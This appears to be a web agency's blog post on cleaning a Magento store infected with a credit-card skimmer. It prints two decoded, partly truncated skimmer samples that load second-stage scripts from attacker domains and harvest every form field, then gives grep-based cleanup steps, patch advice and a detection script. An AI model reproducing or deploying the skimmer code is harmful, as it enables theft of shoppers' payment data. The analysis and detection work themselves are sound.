One of my clients complained about a trojan alert on his Magento website. We checked the pages and found the code below in System > Configuration > Design > Footer > Miscellaneous HTML.
The malicious code had been injected into the Magento database, specifically into the core_config_data table, which is where that configuration field is stored. The JavaScript loads the skimmer from informaer[.]net. Here is part of the malware we found, after decoding it from its hex-encoded form:
Code Sample
————————————————————————————————————-
<script type="text/javascript">
<!--
var be20b6410993ea4c7a48767775856514b={
  snd:null,
  // Second-stage script fetched from the attacker's domain
  e294b002686cad2df01bb59e3e2299f3e:'https://informaer.net/js/info_jquery.js',
  // Per-victim id: reuse the "setidd" cookie if it already exists...
  myid:(function(name){
    var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
    return matches?decodeURIComponent(matches[1]):undefined;
  })('setidd')||(function(){
    // ...otherwise mint one (timestamp-random) and keep it in a cookie for 24 hours
    var ms=new Date();
    var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
    var date=new Date(new Date().getTime()+60*60*24*1000);
    document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
    return myid;
  })(),
  // Harvest every filled-in form field on the page into snd as name=value&...
  // (snd is reset to null, so the collected string starts with the text "null")
  clk:function(){
    be20b6410993ea4c7a48767775856514b.snd=null;
    var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
    for (var i=0;i<inp.length;i++){
      if(inp[i].value.length>0){
        var nme=inp[i].name;
        if(nme==''){nme=i;}
        be20b6410993ea4c7a48767775856514b.snd+=inp[i].name+'='+inp[i].value+'&';
      }
    }
  },
  // Exfiltration routine (rest of the sample truncated in the original)
  send:function(){……………………………………..
……………………………………………………………………………………………………
Once decoded, the code turned out to be a Credit Card Hijack (CCH): malicious JavaScript injected into a Magento shop to steal credit card information. It collects the value of every filled-in form field on the page, which on the checkout includes the card number, expiry date and CVV, and then sends that data to a site the attacker controls. Because the script runs as part of the shop's own page, it reads the fields before the form is submitted, so HTTPS on the checkout does not protect the customer.
During further investigation we found a second piece of malicious code being used to steal credit card information from compromised Magento sites, in addition to a ccard.js file:
Code Sample
——————————————————————————————————————–
<script type="text/javascript">
<!--
var grelos_v={
  snd:null,
  // Second-stage script fetched from a look-alike jQuery CDN domain
  Glink:'https://cloud-jquery.org/code/jquery.min.js',
  // Same per-victim "setidd" cookie logic as the first sample
  myid:(function(name){
    var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
    return matches?decodeURIComponent(matches[1]):undefined;
  })('setidd')||(function(){
    var ms=new Date();
    var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
    var date=new Date(new Date().getTime()+60*60*24*1000);
    document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
    return myid;
  })(),
  // Custom base64 encoder used to wrap the harvested data (rest of the sample truncated in the original)
  base64_encode:function(data){
………..
…………………………………………………………………………
How We Removed the Trojan (Infected Code) and Recovered the Website
Step 1: Search for the infected code in the source code and in the database using find and grep.
Find & grep command:
find /var/magento/root/folder -type f -exec grep -iHn --color=always 'informaer' {} \;
Run the same search for the second domain (cloud-jquery) and for the cookie name setidd, and query the core_config_data table for the same strings, since that is where the footer HTML is stored. Every file type is a candidate: the injected script can sit in a template (.phtml), a .js file or a database row.
Step 2: Reset the Magento backend password for every admin user, and the FTP/SSH passwords as well, using strong passwords. While doing so, review the admin_user table for accounts you did not create, and rotate the database password stored in app/etc/local.xml.
Step 3: Apply security patches.
Scan the website at https://www.magereport.com for security issues.
The scan showed that the security patches SUPEE-9767 and SUPEE-8788 were missing; both need to be applied to protect against unauthorized access.
We applied the security patches to secure the website's data: customers, orders and products.
* Make sure to take a backup before applying security patches.
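The search in Step 1, carried out over both places the post names, as an added example (this is not code from the original post): a POSIX shell script that greps the Magento tree for the indicators seen in the two samples above and checks an export of core_config_data for rows that load a remote script. The storage path design/footer/absolute_footer for the footer Miscellaneous HTML box, the tab-separated export format (mysql --batch) and the sample tree and export written by make_sample are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not code from the original post: hunt for the injected skimmer in a Magento 1
# install. It covers both places the post mentions: the file tree (Step 1's find/grep) and the
# core_config_data rows behind System > Configuration > Design (the footer "Miscellaneous HTML"
# box is assumed to be stored under the path design/footer/absolute_footer). The indicator strings
# come from the two samples on the page; the tree and export written by make_sample are constructed.

# Indicators: the two loader domains, the cookie/variable names and the field-harvesting call.
INDICATORS='informaer\.net|cloud-jquery\.org|setidd|grelos_v|querySelectorAll\("input, *select, *textarea'
export INDICATORS

# scan_tree DIR: print every text file under DIR that contains an indicator (binaries skipped).
scan_tree() {
    grep -rIlE "$INDICATORS" "$1" 2>/dev/null | sort
}

# scan_config EXPORT: EXPORT is a tab-separated file with a header line and the columns
# config_id, path, value, as produced on a live host by
#   mysql --batch -e "SELECT config_id, path, value FROM core_config_data" magentodb > export.tsv
# Prints "config_id path" for rows whose value loads a remote <script src=...> or matches an indicator.
scan_config() {
    awk -F '\t' '
        NR > 1 && ($3 ~ /<script[^>]*src=.?https?:\/\// || $3 ~ ENVIRON["INDICATORS"]) { print $1, $2 }
    ' "$1"
}

# make_sample DIR: write a constructed Magento-like tree (DIR/htdocs) and export (DIR/export.tsv)
# so the scanners can be exercised offline.
make_sample() {
    tpl="$1/htdocs/app/design/frontend/base/default/template/page/html"
    mkdir -p "$tpl"
    printf '<div class="footer"><p>Clean footer</p></div>\n' > "$tpl/footer.phtml"
    printf '<script type="text/javascript">var grelos_v={snd:null,Glink:"https://cloud-jquery.org/code/jquery.min.js"};</script>\n' \
        > "$tpl/head.phtml"
    printf 'config_id\tpath\tvalue\n' > "$1/export.tsv"
    printf '1\tdesign/footer/absolute_footer\t<script type="text/javascript" src="https://informaer.net/js/info_jquery.js"></script>\n' >> "$1/export.tsv"
    printf '2\tweb/unsecure/base_url\thttp://shop.example/\n' >> "$1/export.tsv"
    printf '3\tdesign/head/includes\t<script>document.cookie="setidd=1"</script>\n' >> "$1/export.tsv"
}

# Demo run on the constructed sample. On a real host point scan_tree at the Magento root and
# scan_config at an export of the live core_config_data table.
SAMPLE=$(mktemp -d)
make_sample "$SAMPLE"
echo "Infected files:"
scan_tree "$SAMPLE/htdocs"
echo "Suspicious config rows:"
scan_config "$SAMPLE/export.tsv"
rm -rf "$SAMPLE"
```

The config check flags any row that pulls a script from a remote host, not only the two domains seen here, because the next infection will use a different domain; treat every hit as suspicious until you can tie the URL to a plugin you installed yourself.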
Contact us here for any web solution.